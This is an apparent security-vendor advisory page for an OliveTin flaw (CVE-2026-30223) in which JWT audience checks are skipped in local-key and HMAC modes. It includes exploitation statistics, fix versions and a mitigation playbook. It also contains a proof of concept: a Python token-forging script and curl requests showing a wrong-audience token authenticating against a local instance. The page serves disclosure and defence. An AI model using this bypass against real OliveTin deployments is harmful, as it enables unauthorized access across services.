Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐹
🐹 Go
Not in CISA KEV
HIGH severity

GHSA-g962-2j28-3cg9 OliveTin

HIGHFix: OliveTin/OliveTin@e97d8ec

GHSA-g962-2j28-3cg9 is a high-severity (CVSS 8.8) Improper Authentication vulnerability in github.com/OliveTin/OliveTin. A fix is available for github.com/OliveTin/OliveTin — see the affected versions and patch details below.

OliveTin has JWT Audience Validation Bypass in Local Key and HMAC Modes

Also known asCVE-2026-30223GO-2026-4622
Published
Mar 5, 2026
Updated
Mar 23, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Sep 20, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
  • A successful exploit gives an attacker total control of the affected component, not partial access.

Exploitation and automatability from CISA’s SSVC triage for GHSA-g962-2j28-3cg9.

EPSS Exploitation Probability

via FIRST.org ↗
0.3%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs23th percentile — riskier than 23% of all scored CVEsHighest risk

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

How urgent is this, really

GHSA-g962-2j28-3cg9 plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.

Where this sits among everything scored

Of 377,166 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.

Real-World Exposure

1 pkg affected
🐹github.com/OliveTin/OliveTin

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

When JWT authentication is configured using either:

  • authJwtPubKeyPath (local RSA public key), or
  • authJwtHmacSecret (HMAC secret),

the configured audience value (authJwtAud) is not enforced during token parsing. As a result, validly signed JWT tokens with an incorrect aud claim are accepted for authentication. This allows authentication using tokens intended for a different audience/service.

Details

Affected Code

File: jwt.go Lines: 51–59, 144–157, 161–168

Current Behavior

Remote JWKS Mode (Correct):

return jwt.Parse(jwtToken, jwksVerifier.Keyfunc, jwt.WithAudience(cfg.AuthJwtAud))

Audience validation is enforced.

Local Public Key Mode (Vulnerable):

return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })

No jwt.WithAudience() option is provided.

HMAC Mode (Vulnerable):

return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })

No jwt.WithAudience() option is provided.

Why This Is Vulnerable: authJwtAud is ignored for authJwtPubKeyPath and authJwtHmacSecret modes, so wrong-audience tokens are accepted.

PoC

  1. Configure OliveTin

    Use a minimal config with JWT local key authentication:

    authJwtPubKeyPath: ./public.pem
    authJwtHeader: Authorization
    authJwtClaimUsername: sub
    authJwtAud: expected-audience
    
    authRequireGuestsToLogin: true
    
  2. Generate a Wrong-Audience Token

    python3 - <<EOF
    import jwt, datetime
    
    with open("private.pem") as f:
        key = f.read()
    
    token = jwt.encode(
        {
            "sub": "low",
            "aud": "wrong-audience",   # intentionally wrong
            "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
        },
        key,
        algorithm="RS256"
    )
    
    print(token)
    EOF
    

    This prints the $WRONG_AUD_TOKEN.

  3. Test Without Token (Baseline)

    curl -i -X POST http://localhost:1337/api/WhoAmI \
      -H 'Content-Type: application/json' \
      -d '{}'
    

    Expected response:

    HTTP/1.1 401 Unauthorized
    
  4. Test With Wrong-Audience Token

    curl -i -X POST http://localhost:1337/api/WhoAmI \
      -H 'Content-Type: application/json' \
      -H "Authorization: Bearer $WRONG_AUD_TOKEN" \
      -d '{}'
    

    Expected response:

    HTTP/1.1 200 OK
    {"authenticatedUser":"low","provider":"jwt","usergroup":"","acls":[],"sid":""}
    

    Authentication succeeds even though the aud claim is incorrect.

Impact

An attacker who possesses a valid JWT signed by the configured key (or HMAC secret) but intended for a different audience can authenticate successfully.

This enables:

  • Cross-service token reuse
  • Authentication using tokens issued for other systems
  • Trust boundary violation in multi-service environments

This is particularly severe when:

  • OliveTin is deployed behind a centralized SSO provider
  • The same signing key is reused across services
  • Audience restrictions are relied upon for service isolation

This does not bypass ACL authorization. It is strictly an authentication validation flaw.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐹Gogithub.com/OliveTin/OliveTinall versions0.0.0-20260304231339-e97d8ecbd8d6go get github.com/OliveTin/OliveTin@v0.0.0-20260304231339-e97d8ecbd8d6

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OliveTin/OliveTin, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update github.com/OliveTin/OliveTin to 0.0.0-20260304231339-e97d8ecbd8d6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-g962-2j28-3cg9 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like GHSA-g962-2j28-3cg9 can be triaged on real exposure rather than presence alone.

Tailored to GHSA-g962-2j28-3cg9. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary When JWT authentication is configured using either: - `authJwtPubKeyPath` (local RSA public key), or - `authJwtHmacSecret` (HMAC secret), the configured audience value (`authJwtAud`) is not enforced during token parsing. As a result, validly signed JWT tokens with an incorrect `aud` claim are accepted for authentication. This allows authentication using tokens intended for a different audience/service. ### Details **Affected Code** File: `jwt.go` Lines: 51–59, 144–157, 161–168 **Current Behavior** Remote JWKS Mode (Correct): ```go return jwt.Parse(jwtToken, jwksVerifier.Key
O3 Security · Impact-Aware SCA

Is GHSA-g962-2j28-3cg9 in your dependencies?

O3 Security finds GHSA-g962-2j28-3cg9 across Go dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.

GHSA-g962-2j28-3cg9: OliveTin (High 8.8) | O3 Security